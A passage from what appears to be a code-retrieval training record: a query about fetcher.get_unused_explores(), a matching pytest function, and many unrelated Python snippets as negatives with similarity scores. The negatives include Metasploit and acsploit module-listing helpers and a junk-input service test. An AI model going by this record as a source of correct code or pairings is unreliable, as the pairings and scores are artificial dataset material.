now\n\n\t\t\tself.last_gc = time.time()", "def list_uses(self):\n return list(set(self._prop_typology['USE'].values))", "def get_last_used_features(self) -> Set[str]:\n return self.stats[next(reversed(OrderedDict(self.stats)))]['best_performer']['Labels']", "def list_metrics(self):\n pass", "def test_amount_of_listings_many_listings(self):\n listings = steam_market.get_total_amount_of_listings(soup=get_soup_from_path(TEST_FILE_MANY_RESULTS))\n self.assertEqual(164720, listings)", "def test_get_consumed_with_empty_result(self, m):\n url = \"https://www.cellartracker.com/xlquery.asp?User=test-username&Password=test-password&Table=Consumed&Format=tab&Location=1\"\n file = open(\"./tests/fixtures/consumed_empty.tsv\", \"r\")\n m.register_uri(\"GET\", url, status_code=200, text=file.read())\n file.close\n\n cellartracker = CellarTracker(username=\"test-username\", password=\"test-password\")\n data = cellartracker.get_consumed()\n self.assertEqual([], data)", "def _get_gs_energies(self):\n energy = []\n for ground_state in self._ground_states:\n gs_energy = 0.0\n for key in ground_state[\"eci\"].keys():\n gs_energy += ground_state[\"eci\"][key] * ground_state[\"cf\"][key]\n energy.append(len(ground_state[\"atoms\"]) * gs_energy)\n return energy", "def get(self):\n if path.exists(self.cachefile):\n self.invalidion()\n full_cache = self._get_all()\n return full_cache\n else:\n return []" ]
[ "0.7264244", "0.6198452", "0.6186663", "0.59214425", "0.5807355", "0.5651149", "0.56107587", "0.5609498", "0.5529075", "0.5527514", "0.5387147", "0.5349075", "0.52784765", "0.52772737", "0.5273169", "0.5267631", "0.52531534", "0.52378064", "0.52269423", "0.5195598", "0.5152756", "0.5101667", "0.5036905", "0.50301784", "0.4966456", "0.49473494", "0.4895537", "0.48755294", "0.48739398", "0.48575675", "0.4854634", "0.48538315", "0.48427555", "0.48370898", "0.483337", "0.48169672", "0.4811255", "0.4809194", "0.48060906", "0.48021448", "0.47917765", "0.47900212", "0.4780996", "0.47794893", "0.47779965", "0.47766495", "0.47616673", "0.47598553", "0.47570527", "0.4743615", "0.47382724", "0.47339815", "0.4733592", "0.47178137", "0.47141096", "0.4685792", "0.46746832", "0.46711075", "0.4670698", "0.46682346", "0.46661833", "0.46607476", "0.46537694", "0.4646758", "0.46461916", "0.4645883", "0.46430144", "0.46283853", "0.46259853", "0.46251675", "0.46214047", "0.4619092", "0.46186686", "0.46167803", "0.4615743", "0.46079677", "0.46056914", "0.4603387", "0.459509", "0.45924872", "0.45911595", "0.45908293", "0.4589278", "0.4585864", "0.45851335", "0.45830148", "0.4579217", "0.4578508", "0.45783457", "0.4577442", "0.45710373", "0.45552218", "0.45529523", "0.45524603", "0.45517337", "0.45458898", "0.45421264", "0.45399997", "0.45285818", "0.45281065" ]
0.7800213
0
fetcher.get_unused_explores() should return all unused explores.
def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores): unused_explores = fc.get_unused_explores(model=test_model["name"]) assert all(e in test_unused_explores for e in unused_explores)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def summarize_unused_offers(app_queue: Optional[MarathonQueueItem]) -> Dict[str, int]:\n unused_offers = get_app_queue_last_unused_offers(app_queue)\n reasons: Dict[str, int] = defaultdict(lambda: 0)\n for offer in unused_offers:\n for reason in offer[\"reason\"]:\n reasons[reason] += 1\n return reasons", "def unused_evals(self):\n\t\treturn self.Evals - self.nFES", "def getExpired(self, idle=365):\n cutOff = datetime.datetime.now() - datetime.timedelta(days=idle)\n return [x for x in self.xeps if x.status == \"Experimental\" and x.date < cutOff]", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def get_unassigned_tags(**kwargs):\n return Tags.get_unassigned_tags(**kwargs)", "def retrieve_closed_issues(self):\n return self._retrieve_issues(\"closed\")", "def undefhits(self) :\n\t\ttry :\n\t\t\treturn self._undefhits\n\t\texcept Exception as e:\n\t\t\traise e", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def test_obtain_issues_exclude_wrong_severity(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='Low')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_incomplete_exp_summaries(user_id):\n incomplete_exploration_ids = get_all_incomplete_exp_ids(user_id)\n\n number_deleted = 0\n for exploration_id in incomplete_exploration_ids:\n if not exp_services.does_exploration_exists(exploration_id):\n number_deleted = number_deleted + 1\n remove_exp_from_incomplete_list(user_id, exploration_id)\n\n return exp_services.get_exploration_summaries_matching_ids(\n incomplete_exploration_ids), number_deleted", "def get_unhealthy_instances(self):\n unhealthy = []\n for instance in self.instances.itervalues():\n if instance.state == InstanceState.RUNNING_FAILED:\n unhealthy.append(instance)\n continue # health report from epuagent (or absence of it) is irrelevant\n\n if instance.health not in _HEALTHY_STATES:\n\n # only allow the zombie state for instances that are\n # terminated\n if (instance.state < InstanceState.TERMINATED or\n instance.health == InstanceHealthState.ZOMBIE):\n unhealthy.append(instance)\n\n return unhealthy", "def check_for_exposed(context):\n json_data = context.response.json()\n if \"exploitable_vulnerabilities_count\" in json_data:\n raise Exception(\"Field exploitable_vulnerabilities_count Exposed in\"\n \" Free user result\")\n if \"vendor_package_link\" in json_data:\n raise Exception(\"Field vendor_package_link has been exposed for free user\")", "def test_obtain_issues_no_query(self, mock_url_read):\n mock_url_read.side_effect = \\\n [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}', '<CxXMLResults />']\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def _CheckExpirations(file_objs):\n expired = []\n unexpired = []\n for file_obj in file_objs:\n if _IsExpired(file_obj):\n expired.append(file_obj)\n else:\n unexpired.append(file_obj)\n return expired, unexpired", "def get_app_queue_last_unused_offers(\n app_queue_item: Optional[MarathonQueueItem],\n) -> Sequence[Dict]:\n if app_queue_item is None:\n return []\n return app_queue_item.last_unused_offers", "def _get_remaining(self):\n remaining = []\n for game_info in self.steam_keys:\n if game_info[1] not in self.steam_keys_given:\n remaining.append(game_info[0])\n return remaining", "def explores(self, explores):\n\n self._explores = explores", "def get_expired_nscache():\n now = int(time())\n keys_to_del = []\n for key, odict in nscache.iteritems():\n for dn, ce in odict.iteritems():\n if ce._expiration - now <= 0:\n keys_to_del.append((key, dn))\n return (keys_to_del, nscache)", "def list_unresolved(self): # new\n feed = self.get_feed(limit=999999)\n posts = feed.get(\"threads\")\n\n for s in posts:\n if (\n s.get(\"approved_status\", \"approved\") != \"rejected\"\n and (\n s.get(\"type\", \"question\") != \"post\" or s.get(\"is_megathread\", True)\n )\n and not s.get(\"is_answered\", True)\n and s.get(\"unresolved_count\", 1)\n ):\n yield s", "def forget(self, request):\n return []", "def forget(self, request):\n return []", "def get_low_use_instances(self):\n response = self.support.describe_trusted_advisor_check_result(checkId=LOW_USE_CHECK_ID, language='en')\n if 'result' in response:\n return response['result'].get('flaggedResources', [])", "def missing_data_amounts():\n\n return [2]", "def get_leverables(self):\n import re\n\n \"\"\"\n Gets all groups (leverables) from nexus\n :return: list\n \"\"\"\n if self.url == 'test':\n leverabellist = ['asu', 'bll', 'tfp']\n else:\n leverabellist = []\n try:\n response = urlopen('http://' + self.url + '/nexus/content/repositories/rpm-dev/fk/rpm/')\n except (HTTPError, URLError) as e:\n logger.error(e)\n return ['Error getting leverables!!!']\n\n for rline in response:\n line = rline.decode(\"utf-8\")\n if re.match(\".*<td>(.*)/repositories/(.*)\", line):\n leverabellist.append(line.split('\">')[-1].split('/')[0])\n\n return leverabellist", "def get_healthy_instances(self):\n return [instance for instance in self.instances.itervalues()\n if instance.health in _HEALTHY_STATES and\n instance.state < InstanceState.RUNNING_FAILED]", "def _filter_return_errors_list(self, url, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n for entry in har[\"log\"][\"entries\"]:\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n if url in entry[\"request\"][\"url\"] and temp not in matches and entry[\"response\"][\"status\"] >= 400:\r\n print \"\\nRequest failed w/ \" + str(entry[\"response\"][\"status\"]) + \" error:\\n\" + entry[\"request\"][\"url\"]\r\n if entry[\"response\"][\"content\"].get(\"text\"):\r\n print \"RESPONSE: \" + str(entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore'))\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n matches.append([temp,entry[\"response\"][\"content\"].get(\"text\",\"\")])\r\n return matches", "def remove_unreachable_urls(list_of_urls):\n list_of_reachable_url = []\n for url in list_of_urls:\n try:\n f = requests.get(url)\n print('\\t',url, 'status_code:', f.status_code)\n list_of_reachable_url.append(url)\n except:\n print('\\t',url, 'not reachable -- > removed')\n\n return list_of_reachable_url", "def get_stale_assigned_tasks():\n\n # select t.id from tasks t, actions a where\n # a.task_id = t.id and t.currentaction = 'assigned'\n # group by t.id having now() - max(a.timestamp) < interval '1 day';\n return db.session.query(Task).filter_by(\n currentaction='assigned').join(Task.actions).group_by(\n Task.id).having(max(Action.timestamp) > stale_threshold).all()", "def list_missing_for_deposit(self, needs: Tuple) -> List[int]:\n missing = []\n for item in needs:\n if not any(self.needed_keywords_list(item)):\n missing.append(item)\n return missing", "def test_dos_list_service_huge_junk(self):\n # create a huge list of domain\n attack_string = \"1\" * 3500\n params = {\"junk\": attack_string}\n resp = self.client.list_services(param=params)\n self.assertTrue(resp.status_code < 503)", "def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]", "def getRpmBlacklist():\n global index\n enabledRpms = set()\n for stream in enabledStreams.values():\n enabledRpms = enabledRpms.union(stream.get_rpm_artifacts())\n\n allRpms = set()\n for name in index.get_module_names():\n module = index.get_module(name)\n for stream in module.get_all_streams():\n allRpms = allRpms.union(stream.get_rpm_artifacts())\n\n return list(allRpms.difference(enabledRpms))", "def scrape_issues(self, url):\n try:\n self.driver.get(url)\n except common.exceptions.InvalidSessionIdException:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n except Exception:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n buganizer_issues = []\n\n if \"Buganizer\" not in page_title or \"componentid\" not in page_title:\n if \"MOMA Single Sign On\" in page_title:\n error_message = \"ERROR: You must log into your MOMA account \"\\\n \"first. Select the 'Use Security Code' option and generate a security code at go/sc.\\n\"\n self.logger.log(error_message)\n\n while \"Buganizer\" not in page_title:\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n time.sleep(1)\n\n return buganizer_issues\n error_message = \"ERROR: URL does not link to a Buganizer \"\\\n \"componentid, check specified URL \"\\\n \"in constants.py\\n\"\n self.logger.log(error_message)\n return buganizer_issues\n\n for tbody in soup.find_all('tbody'):\n for _tr in tbody.find_all('tr'):\n issue_link = \"https://b.corp.google.com/issues/\" + _tr.get(\n 'data-row-id')\n buganizer_issues.append(issue_link)\n return buganizer_issues", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def allUnresolved(request, page=1):\n objects = im.Issue.objects.filter(resolved_state__isnull=True).reverse()\n \n \n args = utils.generatePageList(request, objects, page)\n args['issues'] = args['objects']\n \n args['no_results'] = args['page'].object_list.count() < 1\n\n return render_to_response(\"issue_list.html\", args,\n context_instance=RequestContext(request))", "def get_items_not_in_stock():\n try:\n return get_items_arent_on_stock(), 200\n except:\n return \"An error ocurred\", 404", "def excluded_from_scan(self):\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'spider/view/excludedFromScan/')))", "def get_issues(): # pragma: no cover\n global issue_data\n team = {\n 'stevex196x': 0,\n 'TheSchaft': 0,\n 'melxtru': 0,\n 'aylish19': 0,\n 'connormlewis': 0,\n 'tsukkisuki': 0\n }\n all_issues = 0\n while all_issues == 0:\n url = ('https://api.github.com/repos/connormlewis/idb/'\n 'issues?state=all&filter=all&per_page=100')\n data = requests.get(\n url, headers={'Authorization': 'token ' + os.environ['API_TOKEN']})\n link = data.headers.get('Link', None)\n for i in range(1, int(find_last_page(link)) + 1):\n url = (\n 'https://api.github.com/repos/connormlewis/idb/'\n 'issues?state=all&filter=all&per_page=100' + '&page=' + str(i))\n data = requests.get(\n url,\n headers={'Authorization': 'token ' + os.environ['API_TOKEN']})\n json_list = data.json()\n for entry in json_list:\n if 'pull_request' not in entry:\n all_issues += 1\n if entry['user']['login'] in team:\n team[entry['user']['login']] += 1\n return team, all_issues", "async def get_unused(self, join_partitions):\n all_disks = await self.middleware.call('disk.query')\n\n serial_to_disk = defaultdict(list)\n for disk in all_disks:\n serial_to_disk[(disk['serial'], disk['lunid'])].append(disk)\n\n reserved = await self.middleware.call('disk.get_reserved')\n disks = [disk for disk in all_disks if disk['devname'] not in reserved]\n\n for disk in disks:\n disk['duplicate_serial'] = [\n d['devname']\n for d in serial_to_disk[(disk['serial'], disk['lunid'])]\n if d['devname'] != disk['devname']\n ]\n\n if join_partitions:\n for disk in disks:\n disk['partitions'] = await self.middleware.call('disk.list_partitions', disk['devname'])\n\n return disks", "def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors", "def get_low_use_instances(self):\n return self.low_use.batch_get_item(EmailSent=True)", "def get_vulnerable_items(self):\n\n results = []\n\n for action in self.__actions:\n if self.__driver.stopping:\n break\n\n items = action.get_action_items(self.__queue_item)\n\n for item in items:\n if self.__driver.stopping:\n break\n\n if item.get_hash() in self.scanned_hashes:\n continue\n\n self.scanned_hashes.append(item.get_hash())\n\n if self.__is_item_vulnerable(item):\n results.append(item)\n\n return results", "def _filter_return_errors(self, url, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n for entry in har[\"log\"][\"entries\"]:\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n if url in entry[\"request\"][\"url\"] and temp not in matches and entry[\"response\"][\"status\"] >= 400:\r\n print \"\\nRequest failed w/ \" + str(entry[\"response\"][\"status\"]) + \" error:\\n\" + entry[\"request\"][\"url\"]\r\n if entry[\"response\"][\"content\"].get(\"text\"):\r\n print \"RESPONSE: \" + str(entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore'))\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n matches.append(temp)\r\n return matches", "async def delete_expired_responses(self):\n logger.info(f'Deleting all responses more than {self.expire_after} hours old')\n keys_to_delete = set()\n\n for key in await self.responses.keys():\n response = await self.get_response(key)\n if response and response.is_expired:\n keys_to_delete.add(key)\n\n logger.info(f'Deleting {len(keys_to_delete)} expired cache entries')\n for key in keys_to_delete:\n await self.delete(key)", "def remove_expired(self):\n now = time.time()\n return [self.remove_if_expired(key, now) for key in self._request_sessions.keys()[:]].count(True)", "def _computeunstableset(repo):\n # revset is not efficient enough here\n # we do (obsolete()::) - obsolete() by hand\n obs = getrevs(repo, 'obsolete')\n if not obs:\n return set()\n cl = repo.changelog\n return set(r for r in cl.descendants(obs) if r not in obs)", "def get_all_incomplete_exp_ids(user_id):\n incomplete_activities_model = (\n user_models.IncompleteActivitiesModel.get(\n user_id, strict=False))\n\n if incomplete_activities_model:\n incomplete_activities = get_incomplete_activities_from_model(\n incomplete_activities_model)\n\n return incomplete_activities.exploration_ids\n else:\n return []", "def get_bad_words(bad_words_url):\n r = requests.get(bad_words_url)\n\n if r.status_code != 200:\n raise requests.RequestException\n\n bad_words = r.text.strip().split(\"\\n\")\n return bad_words", "async def test_nr_of_missing_metrics_without_reports(self):\n self.set_source_parameter(\"reports\", [])\n response = await self.collect(get_request_json_side_effect=[self.data_model, self.reports])\n self.assert_measurement(\n response,\n value=str(len(self.entities)),\n total=self.expected_software_metrics,\n entities=self.entities,\n )", "def get_malware_used_by_groups():\n global malware_used_by_groups\n\n if not malware_used_by_groups:\n malware_used_by_groups = rsh.malware_used_by_groups(get_srcs())\n\n return malware_used_by_groups", "def getMissingIds(self):\n return self._missingIds", "def gettotal(self, response):\n url = 'http://www.ppdai.com/blacklist/'\n years = xrange(2008,2016)\n urls = [url+str(year) for year in years]\n for url in urls:\n # print url, \"year url\"\n yield Request(url, callback=self.extract, dont_filter=True)", "def get_usages(self):\n return self.client._perform_json(\"GET\", \"/projects/%s/managedfolders/%s/usages\" % (self.project_key, self.odb_id))", "def get_invalid_hosts(self):\n invalid_pub_key = []\n for host in self.config.get(\"hosts\"):\n if datetime.strptime(str(host.get(\"expire_date\")), \"%Y%m%d\") < datetime.now():\n invalid_pub_key.append(host.get(\"pub_key\"))\n return invalid_pub_key", "def allBroken(request, page=1):\n objects = im.Issue.objects.filter(resolved_state__isnull=True)\n args = utils.generatePageList(request, objects, page)\n args['issues'] = args['objects']\n issues_list = {'Issues on Unusable Machines':[]}\n for issue in args['issues']:\n iss_id = issue.item.item_id\n machine = mac.Item.objects.get(item_id=iss_id)\n\n if machine.unusable:\n issues_list['Issues on Unusable Machines'].append(issue)\n\n args['object_list'] = issues_list.items() \n args['no_results'] = args['page'].object_list.count() < 1\n return render_to_response(\"grouped_issue_list.html\", args,\n context_instance=RequestContext(request))", "def get_weak_hosts(self):\n weak = []\n try:\n for host in self.get_hosts_only():\n # Checks for the success code against each host in the dictionary\n if self.get_ftp_code(host) == 220:\n weak.append(host)\n except TypeError:\n pass\n return weak", "def issues(self):\n if self.pull_request.body is not None:\n regex = r\"(?<=closes: #|elated: #)\\d{5}\"\n issue_strs = re.findall(regex, self.pull_request.body)\n self.issue_nums = [eval(s) for s in issue_strs]", "def list(self):\n path = \"authSettings/exemptedUrls\"\n return self._session.get(path)", "def sitetotalrequests(self) :\n\t\ttry :\n\t\t\treturn self._sitetotalrequests\n\t\texcept Exception as e:\n\t\t\traise e", "def clear_expired_exceptions():\n print(\"Clearing out exceptions that have an expired TTL...\")\n clear_old_exceptions()\n print(\"Completed clearing out exceptions that have an expired TTL.\")", "def list_unique_problems(arn=None, nextToken=None):\n pass", "def getEnemyGhost(self,gameState):\r\n enemyList = []\r\n for enemy in self.getOpponents(gameState):\r\n enemyState = gameState.getAgentState(enemy)\r\n if (not enemyState.isPacman) and enemyState.scaredTimer == 0:\r\n enemyPos = gameState.getAgentPosition(enemy)\r\n if enemyPos != None:\r\n enemyList.append(enemy)\r\n return enemyList", "def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_untested(self):\n return [result for result in self.values() if result.outcome == Result.UNTESTED]", "def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n self.assertEqual('JScript Vulnerabilities', issues[0].group)\n self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def get_misused_opt_arg_dec():\n return list(incompletely_used_decorators.values())", "def clean_stale_issues():\n from security_monkey.common.audit_issue_cleanup import clean_stale_issues\n clean_stale_issues()", "def karma_exceptions(self, server, channel, nick, params):\n return pretty_list(self.exceptions)", "def vulnerabilities(self):\n db = get_thread_scoped_session()\n known_vulnerabilities = db.query(ImagePackageVulnerability).filter(\n ImagePackageVulnerability.pkg_user_id == self.user_id,\n ImagePackageVulnerability.pkg_image_id == self.id).all()\n return known_vulnerabilities", "def get_tag_without_all_service(**kwargs):\n ix = kwargs.pop('ix')\n channel = kwargs.pop('channel')\n all_tags = set(range(1, 4097))\n\n channel_available_tags = get_free_tags(ix=ix, channel=channel)\n all_ix_used_tags = Tag.objects.filter(\n Q(status='PRODUCTION') | Q(reserved=True),\n ix=ix\n )\n\n free_tags = channel_available_tags.exclude(\n tag__in=all_ix_used_tags.values_list('tag', flat=True))\n\n if(not free_tags and len(all_ix_used_tags) <=\n MAX_TAG_NUMBER - MIN_TAG_NUMBER):\n tags_to_create = all_tags - \\\n set(all_ix_used_tags.values_list('tag', flat=True))\n tag = list(tags_to_create)[0]\n free_tags = instantiate_tag(channel=channel, ix=ix, tag_number=tag)\n free_tags = Tag.objects.filter(pk=free_tags.pk)\n\n return free_tags", "def extract_listings(page_url, attempts=10):\r\n \r\n listings_max = 0\r\n listings_out = [BeautifulSoup('', features='html.parser')]\r\n for idx in range(attempts):\r\n try:\r\n answer = requests.get(page_url, timeout=5)\r\n content = answer.content\r\n soup = BeautifulSoup(content, features='html.parser')\r\n listings = soup.findAll(\"div\", {\"class\": \"_gig1e7\"})\r\n except:\r\n # if no response - return a list with an empty soup\r\n listings = [BeautifulSoup('', features='html.parser')]\r\n\r\n if len(listings) == 20:\r\n listings_out = listings\r\n break\r\n\r\n if len(listings) >= listings_max:\r\n listings_max = len(listings)\r\n listings_out = listings\r\n\r\n return listings_out", "def stop_loss_prices(self) -> List[float]:\n return self._stop_loss_prices", "def get_all_failures(self):\n return self._get_filtered_results(success=False)", "def get_requests(url, user, passwd):\n \n #get\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n \n #if timout\n if r.status_code == 403:\n print(\"LIMIT EXCEEDED\")\n print(\"WAIT AN HOUR\")\n i=1\n while r.status_code != 200:\n time.sleep(60)\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n print(\"{} MINUTES ELAPSED\".format(i))\n i+=1\n elif r.status_code != 200:\n print(r.status_code)\n return []\n #return data\n data = r.json()\n return data", "def test_api_can_get_filtered_issues_list(self):\n path = '/issues/?language=python&tech_stack=django&experience_needed=moderate'\n response = self.client.get(path, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertGreater(len(api_response_issues), len(json.loads(response.content)))", "def find_delay_issues(self, msg, delay_days, unassign):\n self._asset_bind(msg)\n yield (\"Processing....\")\n trans = self._translation_util(msg)\n client = self._github_operator(msg)\n issues = find_delay_issues(trans, client, delay_days)\n if unassign == 0:\n yield (\"\\n\".join(limit_result([\"{}: {}, {}, {}\".format(issues[i][0].number, issues[i][0].title, issues[i][2], issues[i][3]) for i in issues])))\n else:\n success = unassign_issues(trans, issues)\n yield \"relassed {} issues that have been accepted for more than {} days\".format(success, delay_days)", "def check_for_no_privates(context):\n json_data = context.response.json()\n\n if \"component_analyses\" in json_data:\n vulnerabilities = json_data['component_analyses']['vulnerability']\n for v in vulnerabilities:\n assert \"cvss\" in v\n assert \"is_private\" in v\n assert \"vendor_cve_ids\" in v\n if v[\"is_private\"]:\n raise Exception(\"Private vulnerability found\")", "def discard_cached_summaries() -> None:\n for summary in get_all_summaries().values():\n summary.discard()", "def get_free_games(self) -> List[Game]:", "def get_possible_exploit(self):\n return 'exploit', self.exploit.run()", "def undead(self):\n cutoff = datetime.utcnow() - timedelta(seconds=HEARTBEAT_FAILED)\n return self.status_in(\"active\").filter(heartbeat__lt=cutoff)", "def resolve_vulns(self):\n for vuln in self.vulns:\n for ref in vuln.refs:\n if 'cve' in str.lower(ref):\n results = str(self.client.console_execute('search cve:{0}\\n'.format(ref))[b'data'])\n while not 'Modules' in results:\n sleep(10)\n results = self.client.console_read()\n results = results.split('\\n')\n for line in results:\n if 'exploit' in line:\n self.exploits.append(line.split(' ')[0])", "async def giveaway_remaining_list(self, ctx):\n\n remaining = self._get_remaining()\n remaining_str = '\\n'.join(remaining)\n\n await ctx.send(\n f\"{len(remaining)} remaining games:\\n\"\n f\"```\\n{remaining_str}\\n```\"\n )", "def _get_cache_tags(self):\n try:\n project = self._get_project()\n version = self._get_version()\n except Exception:\n log.warning(\n \"Error while retrieving project or version for this view.\",\n exc_info=True,\n )\n return []\n\n tags = []\n if project:\n tags.append(project.slug)\n if project and version:\n tags.append(get_cache_tag(project.slug, version.slug))\n if project and self.project_cache_tag:\n tags.append(get_cache_tag(project.slug, self.project_cache_tag))\n return tags", "def get_dead_keys(self):\n return self.dead_keys", "def likely_regressions(self):\n return set([label for label, count in self.regressions.items() if count == 0])", "def get_all_blacklisted_as_list(self):\n try:\n result = self.table.select().execute()\n if result.rowcount >= 1:\n return [x.values() for x in result]\n elif result.rowcount == 0:\n return []\n except Exception as e:\n self.log(e, self.identifier)\n raise egg_errors.QueryNotPossible", "def get_insecure_entities(self) -> list:\n return [\n entity[CONF_FRIENDLY_NAME]\n for entity in self.args[\"secure_status_mapping\"]\n if self.get_state(entity[\"entity_id\"]) == entity[CONF_STATE]\n ]", "def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)", "def unused_featurevalues():\n\n fvs = FeatureValue.objects.filter(feature__active=True)\n unused_fvs = fvs.filter(languages__isnull=True)\n natlang_only_fvs = fvs.filter(languages__language__natlang=True).exclude(languages__language__natlang=False)\n\n if not natlang_only_fvs:\n # Natlangs had no unique features so return early\n return unused_fvs\n\n # dsd\n decorate = ((fv.id, fv) for fv in set(unused_fvs) | set(natlang_only_fvs))\n sort = sorted(decorate)\n return [fv for (_, fv) in sort]", "def dead_agents(self, namespace, timeout_s=60):\n lost = []\n\n with self.lock:\n for agent in self.agents(namespace):\n if agent.message and datetime.utcnow().timestamp() - agent.heartbeat > timeout_s:\n lost.append(agent)\n\n return lost", "def unshorten(self, url):\n h = requests.get(url)\n stack = [i.url for i in h.history]\n stack.append(h.url)\n return stack", "def _filter_entries_by_url_response(self, url, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n if len(har[\"log\"][\"entries\"]) > 1:\r\n for entry in har[\"log\"][\"entries\"]:\r\n if url in entry[\"request\"][\"url\"]:\r\n if entry[\"response\"][\"status\"] == 200 and entry[\"response\"][\"content\"].get(\"text\") and entry[\"response\"][\"content\"][\"text\"] != \"\":\r\n temp = entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore')\r\n matches.append(temp)\r\n return matches", "def get_not_meals():\n\n not_meals = DailyMenuRating.objects.filter(is_meal=False).prefetch_related('daily_menu').all()\n tagger = RecipeTagger()\n\n tags_counted = Counter()\n for rating in not_meals:\n tags = tagger.get_static_tags(rating.daily_menu.name, include_multiple_words=False)\n\n for tag in tags:\n tags_counted[tag] += 1\n\n return tags_counted" ]
